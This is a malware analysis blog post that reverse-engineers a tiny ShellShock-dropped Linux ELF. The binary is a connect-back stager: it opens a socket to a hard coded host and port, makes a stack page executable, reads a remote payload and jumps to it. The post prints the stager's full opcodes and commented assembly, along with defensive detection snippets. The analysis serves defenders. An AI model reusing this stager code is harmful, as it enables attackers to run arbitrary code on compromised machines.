The background
In September 2014, while the ShellShock exploitation incidents were in full rush, one of the cases was MMD-0027-2014: two ELF malware payloads dropped via a ShellShock attack, a new malware and a backconnect ELF. The details can be read in-->[here]
Today I found another interesting ELF x86-32 sample that was reported several hours ago. The infection vector is also ShellShock. The reporter did not seem sure whether the ELF binary was malicious or not, so I decided to help him dissect it and blog it here, hoping this information will help the security community as a reference for similar cases and to mitigate the same pattern of threat in the future.
The ELF binary looks like this:
It is a statically compiled, 155-byte ELF binary for the Intel 32-bit architecture. From the result of its compilation I can tell that it is shellcode wrapped in C code for Linux, built from a C template with the GCC compiler.
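The size and architecture claims can be checked straight from the ELF header. The following is a minimal Python sketch, not the tooling used for this analysis. The function name `describe_elf32` and the returned keys are illustrative, and it assumes a little-endian ELF32 file whose program headers sit right before the code.

```python
import struct

# 52-byte ELF32 file header, little-endian, as laid out in the ELF specification.
ELF32_EHDR = struct.Struct("<16sHHIIIIIHHHHHH")

def describe_elf32(data):
    """Return a few header fields from raw ELF32 bytes (illustrative helper)."""
    if len(data) < ELF32_EHDR.size or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    (ident, e_type, e_machine, e_version, e_entry, e_phoff, e_shoff,
     e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum,
     e_shstrndx) = ELF32_EHDR.unpack_from(data)
    if ident[4] != 1 or ident[5] != 1:
        raise ValueError("expected a 32-bit little-endian ELF")
    # Assumption: the code starts right after the last program header.
    headers_end = e_phoff + e_phentsize * e_phnum
    return {
        "machine": e_machine,            # 3 means EM_386 (Intel 80386)
        "entry": e_entry,                # virtual address of the first instruction
        "headers_end": headers_end,      # file offset where the headers stop
        "payload_size": len(data) - headers_end,
    }
```

For a 155-byte file with one 32-byte program header, the headers end at offset 0x54 (84), which leaves 71 bytes of code. Assuming the usual 0x08048000 load address, that agrees with the entry point 0x08048054 seen in the listing further down.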
Studying the sample
I am fond of shellcode myself as a hobby, and seeing some of these opcodes suddenly rang a bell. Ignoring the ELF header parts, I can see the shellcode starts at 31 db f7 e3 53 43 53 6a 02 b0 66 and runs until cd 80 ff e1.
Compared to some previous shellcode cases (not in ELF wrapping), this one is shorter. It could be a crop of something bigger that was cut for whatever purpose, a partial module of a threat / bad code / offensive framework series, or just a new small piece of bad code.
Anyhow, I decided to check it out with my beloved tool, radare.
Firing it up, the binary has plain and simple headers, so it is safe to go forward and I moved to where the executable code resides. There, we break the opcodes down into proper assembly, and find that it is straightforward x86-32 assembly, as per below:
At a glance, this shellcode looks the same as what we had in September 2014, but it is slightly different in the last parts, so let's figure out how it differs and how this one works.
Dissection of the evil opcodes
Starting from entry0, I broke the code down into its calls and processes. It takes a while to work through the syscall references, but it is all worth it, and the result of the reverse engineering is the commented opcode/assembly listing pasted below:
[0x08048054]> pdf
;-- eip:
entry0 ();
0x08048054 | 31db       | xor ebx, ebx     ; nulling ebx by xor
0x08048056 | f7e3       | mul ebx          ; edx:eax = eax * ebx = 0 ; nulling eax and edx by mul
0x08048058 | 53         | push ebx         ; push 0 to stack ; from ebx=0x0 (nulled) < IPPROTO_IP
0x08048059 | 43         | inc ebx          ; ebx = 0x1 ; socketcall number 1 = sys_socket
0x0804805a | 53         | push ebx         ; push 1 to stack < SOCK_STREAM
0x0804805b | 6a02       | push 2           ; push 2 to stack < AF_INET
0x0804805d | b066       | mov al, 0x66     ; syscall number 0x66 sys_socketcall
0x0804805f | 89e1       | mov ecx, esp     ; set pointer to arguments array
0x08048061 | cd80       | int 0x80         ; Svc_0 ; sys_socketcall ; sys_socket
0x08048063 | 97         | xchg eax, edi    ; socketfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); kept in edi
0x08048064 | 5b         | pop ebx          ; pop the 2 (AF_INET) left on top of the stack ; ebx = 2
0x08048065 | 680a00020f | push 0xf02000a   ; c2_struct.sin_addr = 10.0.2.15 (bytes 0a 00 02 0f in memory, network order)
0x0804806a | 680200115c | push 0x5c110002  ; c2_struct.sin_port = 4444 ; c2_struct.sa_family=AF_INET (2)
0x0804806f | 89e1       | mov ecx, esp     ; set pointer for *c2_struct to ecx
0x08048071 | 6a66       | push 0x66        ; push 0x66 to stack (to invoke sys_socketcall)
0x08048073 | 58         | pop eax          ; eax = 0x66
0x08048074 | 50         | push eax         ; push 0x66 to stack, reused as the addrlen argument
0x08048075 | 51         | push ecx         ; push pointer *c2_struct
0x08048076 | 57         | push edi         ; push socketfd
0x08048077 | 89e1       | mov ecx, esp     ; set pointer to args array (for sys_connect)
0x08048079 | 43         | inc ebx          ; ebx = 3 ; socketcall number 3 = sys_connect
0x0804807a | cd80       | int 0x80         ; Svc_0 ; sys_socketcall => sys_connect
0x0804807c | b207       | mov dl, 7        ; set sys_mprotect prot = 7 (PROT_READ|PROT_WRITE|PROT_EXEC, i.e. like chmod 777 for a mem-area)
0x0804807e | b900100000 | mov ecx, 0x1000  ; ecx = 4096 (sys_mprotect length)
0x08048083 | 89e3       | mov ebx, esp     ; set pointer memory *addr for sys_mprotect
0x08048085 | c1eb0c     | shr ebx, 0xc     ; shift right ebx by 12 bits
0x08048088 | c1e30c     | shl ebx, 0xc     ; shift left back in, result = esp rounded down to the start of its 4096-byte page (1348 bytes from esp here)
0x0804808b | b07d       | mov al, 0x7d     ; syscall number 0x7d = sys_mprotect
0x0804808d | cd80       | int 0x80         ; Svc_0 ; sys_mprotect(void *addr, length, prot)
0x0804808f | 5b         | pop ebx          ; pop socketfd from stack into ebx (fd for sys_read)
0x08048090 | 89e1       | mov ecx, esp     ; set pointer to the mprotect'ed (exec allowed) stack area (for sys_read's data)
0x08048092 | 99         | cdq              ; zero-out edx
0x08048093 | b60c       | mov dh, 0xc      ; edx = 0x0c00 ; set size 3072 bytes
0x08048095 | b003       | mov al, 3        ; syscall number 0x3 sys_read
0x08048097 | cd80       | int 0x80         ; Svc_0 ; sys_read(fd, buffer, count)
0x08048099 | ffe1       | jmp ecx          ; jump to the executable memory that holds the sys_read data, to execute it
(c) reverse engineering original work of @unixfreaxjp, posted first in blog.malwaremustdie.org
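The hard coded host and port can be recovered from the two push immediates without running anything. This is a small Python sketch of that decoding; the function name is illustrative. It relies on the fact that x86 stores each 32-bit immediate little-endian, while sin_port and sin_addr are kept in network (big-endian) byte order.

```python
import socket
import struct

def decode_sockaddr_pushes(family_port_imm, addr_imm):
    """Decode the two 32-bit immediates that build a sockaddr_in on the stack."""
    # The family/port dword is pushed last, so it sits first in memory.
    raw = struct.pack("<I", family_port_imm) + struct.pack("<I", addr_imm)
    family = struct.unpack_from("<H", raw, 0)[0]  # sin_family, host byte order
    port = struct.unpack_from(">H", raw, 2)[0]    # sin_port, network byte order
    ip = socket.inet_ntoa(raw[4:8])               # sin_addr, network byte order
    return family, port, ip

print(decode_sockaddr_pushes(0x5C110002, 0x0F02000A))  # (2, 4444, '10.0.2.15')
```

Read this way, the bytes 0a 00 02 0f give the address 10.0.2.15, and 11 5c gives port 4444 with family 2 (AF_INET).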
The explanation of the analysis in English is:
First, this code begins by creating a socket and using it for an internet connection. The socket is created with sys_socket(), which is invoked through sys_socketcall() with call number "1". Then, via AF_INET, it connects to a certain host at an IP address and port number, both of which are hard coded in hex in a struct (see the paste above).
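On 32-bit x86 Linux, the socket functions are multiplexed through one syscall: eax selects sys_socketcall (0x66) and ebx selects the sub-call, 1 for socket and 3 for connect. The lookup below is a hedged Python sketch for annotating register values while reading such shellcode. The tables only cover the numbers relevant here, and the helper name is illustrative.

```python
# Partial tables, limited to the calls this sample uses (plus bind for context).
SYSCALLS_I386 = {0x03: "read", 0x66: "socketcall", 0x7D: "mprotect"}
SOCKETCALLS = {1: "socket", 2: "bind", 3: "connect"}

def name_call(eax, ebx):
    """Name the kernel call selected by eax (and by ebx for socketcall)."""
    name = SYSCALLS_I386.get(eax, "unknown")
    if name == "socketcall":
        return "socketcall:" + SOCKETCALLS.get(ebx, "unknown")
    return name

# The four int 0x80 invocations of the sample, in order of execution.
for eax, ebx in [(0x66, 1), (0x66, 3), (0x7D, 0), (0x03, 0)]:
    print(hex(eax), ebx, name_call(eax, ebx))
```

For mprotect and read, ebx carries an address or a file descriptor rather than a selector, so the helper ignores it.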
This method is known as a reverse shell in the UNIX and shellcode/exploitation world. Assuming the reverse connection to the remote machine is established, the remote machine sends data upon connection, and the received data is stored on the victim's machine in a memory area on the stack that will be executed afterward. So what we have in this case is a prepared in-memory code execution scheme.
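The data transfer part of this scheme can be illustrated harmlessly. The Python sketch below is a simulation only: it uses a local socket pair instead of a real remote host, never executes what it receives, and all names are illustrative. It mirrors one detail of the sample, namely that the stage is fetched with a single read of at most 3072 bytes.

```python
import socket

READ_SIZE = 0x0C00  # 3072, the count passed to sys_read in the sample

def receive_stage(sock):
    """Fetch one stage with a single read, as the sample does (no looping)."""
    return sock.recv(READ_SIZE)

def simulate_stage_transfer(stage):
    """Send `stage` over a local socket pair and return what the reader gets."""
    sender, receiver = socket.socketpair()
    try:
        sender.sendall(stage)
        return receive_stage(receiver)  # the bytes are only returned, never run
    finally:
        sender.close()
        receiver.close()

print(len(simulate_stage_transfer(b"\x90" * 8)))
```

Because there is only one read and no length check, whatever arrives in that first read is what would get executed, so the sender has to deliver a stage that fits within 3072 bytes.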
I see the same procedure used in the reverse-shell component(s) of malware, or in the shellcode part of exploitation/post-exploitation frameworks.
Further, I noticed that the beginning of this ELF is coded more or less like the previous case I reported in September 2014, but the bottom part is coded differently. Instead of using /bin/sh to execute the data sent over the backconnect, it uses the mprotect'ed space (English: a memory area whose protection was changed) flagged with prot="7" (which means read/write/exec is allowed), and sys_read reads and saves the data in that area to be executed. The executed data is a shell operation driven from a remote host, which is why it is called a reverse shell.
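The mprotect arguments come from simple arithmetic on the stack pointer. Here is a short Python sketch of it; the esp value is hypothetical (picked only so the numbers are easy to follow) and the helper names are illustrative.

```python
PAGE_SHIFT = 12  # the shr/shl by 0xc in the listing
PROT_READ, PROT_WRITE, PROT_EXEC = 1, 2, 4

def page_start(addr):
    """Round an address down to the start of its 4096-byte page."""
    return (addr >> PAGE_SHIFT) << PAGE_SHIFT

def mprotect_args(esp):
    """Return (addr, length, prot) the way the shellcode derives them."""
    return page_start(esp), 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC

esp = 0xBFFFF544                  # hypothetical stack pointer, not from the sample
addr, length, prot = mprotect_args(esp)
print(hex(addr), length, prot)    # 0xbffff000 4096 7
print(esp - addr)                 # 1348
print(0x0C << 8)                  # 3072, the sys_read count built by "mov dh, 0xc"
```

The shift pair is needed because mprotect only accepts page-aligned addresses; prot 7 is just the three protection flags OR-ed together.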
Some analysis comments
Up to this point I sense a copy-pasta base for this code. Whoever used the code, that adversary is in the middle of an effort to exploit a vulnerability on the targeted machine. If you see this kind of file in your system or traffic, I guarantee there is a bad, bad effort in progress.
In this sample the adversary uses an ELF file instead of injecting shellcode into a memory area, hoping that the lured system will somehow execute the ELF. For that, he tries to go unnoticed by dropping this little 155-byte ELF file.
Since the threat is already in the wild, folks, and I think this offensive binary code is hard coded in a lot of post-exploitation frameworks too, it would be good to define this ELF threat type well so that the blue team and sysadmins notice it right away.
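As a starting point for such a definition, the fixed opening and closing bytes quoted earlier (31 db f7 e3 53 43 53 6a 02 b0 66 ... cd 80 ff e1) can be searched for in files or captured traffic. This is a rough Python sketch, not a vetted signature: the function name and the 128-byte window are assumptions, and the IP/port bytes in the middle are deliberately not matched because they differ per sample.

```python
HEAD = bytes.fromhex("31dbf7e35343536a02b066")  # opening opcodes of the stager
TAIL = bytes.fromhex("cd80ffe1")                # int 0x80 ; jmp ecx

def find_stager(blob, max_span=128):
    """Return (start, end) offsets of a HEAD...TAIL match in blob, or None.

    max_span is an assumed upper bound on the stager length.
    """
    start = blob.find(HEAD)
    while start != -1:
        tail_at = blob.find(TAIL, start + len(HEAD), start + max_span)
        if tail_at != -1:
            return start, tail_at + len(TAIL)
        start = blob.find(HEAD, start + 1)
    return None
```

A hit only means the byte pattern is present; it should be treated as a reason to look closer, since short patterns like these can produce false positives.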
Behavior analysis
During the "run" process, sysadmins on any infected machine will see some operations triggered by the malware in kernel space, as per the process calls below:
↑ And of course, a Linux security feature caused this :)
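Going by the dissection, the order of calls to expect is socket, connect, mprotect, read. For sysadmins who record syscall traces, the Python sketch below checks for that order. The input format (a plain list of syscall names) is an assumption, as is a tracer that reports socketcall sub-calls under their own names.

```python
EXPECTED = ["socket", "connect", "mprotect", "read"]

def matches_stager_pattern(trace, expected=EXPECTED):
    """True if the expected names occur in trace in order (gaps are allowed)."""
    remaining = iter(trace)
    # "name in remaining" consumes the iterator up to the first match,
    # so every later name has to appear after the earlier ones.
    return all(name in remaining for name in expected)

print(matches_stager_pattern(["execve", "socket", "connect", "mprotect", "read"]))
```

Plenty of legitimate programs call these functions too, so a match is a hint for triage and not proof of infection.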
Some fun moments on naming this malicious sample
Several products may detect this under various names. The first point is that if they detect it as a malicious object and send alerts, that is just fine.
The correct name may be "backdoor" or "reverse-shell", since a remote attacker is waiting there to be connected to and to push data via TCP to be executed on the compromised machine. The reverse shell is a famous offensive tool.
Some tagged this as a "downloader". Since there is clearly no direct or indirect downloading code in its binary, I don't agree with that name. Other products named this malware "GetShell"... umm, well, it is okay, since it is close enough, but if it goes that far, why not use "reverse shell", which explains the purpose more clearly? For those antivirus products that named this malware "ShellLoader": well, you are a bit too creative! What if the pushed data is not an executable malware but some commands instead? :) That would be a "ShellCommandInjector" too, no? Anyway, good job!
This naming is important for system engineers and sysadmins to know what kind of threat they are dealing with.
Sometimes it takes effort to explain what the actual name for this malware is :-)
The sample, epilogue & follow up
The sample is on VirusTotal and can be accessed here-->[link]
I also added the ShellShock shellcode-compiled malware to its thread on kernelmode [link]
The radare.org [link] developer team has proven to be cool: just from reading this post they added a feature to check the IP address [link] and also added the syscall table information [link] for FreeBSD x86-32, for Linux ELF analysis purposes.
For your information, I have used radare since it was just "radare", like in 2007? It was the 1st version (I have used it since /usr/ports), and our team has been an "official" (smile) user for so long [link], with thanks, and I keep on using it happily on all my beloved Demon clusters [link]. Please support them with improvement reports!
Good comments:
.@akochkov @Maijin212 @trufae Okay guys, here's my correction for the syscall table of @radareorg (pic) pic.twitter.com/nSquhLYSUz
— ☩MalwareMustDie (@MalwareMustDie) February 3, 2016
Thank you for participating in the vote [link] and for the feedback about this post:
#MalwareMustDie! | analysis by @unixfreaxjp
"Then you will know the truth, and the truth will set you free." ☩John 8:32